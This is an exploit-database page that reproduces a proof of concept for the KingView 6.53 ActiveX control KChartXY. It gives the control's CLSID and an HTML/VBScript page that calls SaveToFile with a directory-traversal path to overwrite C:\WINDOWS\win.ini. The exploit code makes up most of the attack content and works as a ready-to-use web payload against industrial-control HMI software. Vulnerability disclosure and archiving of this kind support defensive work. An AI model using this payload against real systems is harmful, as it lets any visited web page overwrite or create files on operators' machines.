Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite - exploit.company
header-logo
Suggest Exploit
vendor:
KingView
by:
Blake
N/A
CVSS
N/A
Remote File Creation / Overwrite
CWE
Product Name: KingView
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 / IE
Unknown

KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite

Proof of concept overwrites the win.ini file

Mitigation:

Source

Exploit-DB raw data:

<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53 
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>
<script language='vbscript'>

arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1 

</script>

Navigation

Suggest Exploit

Services By CQR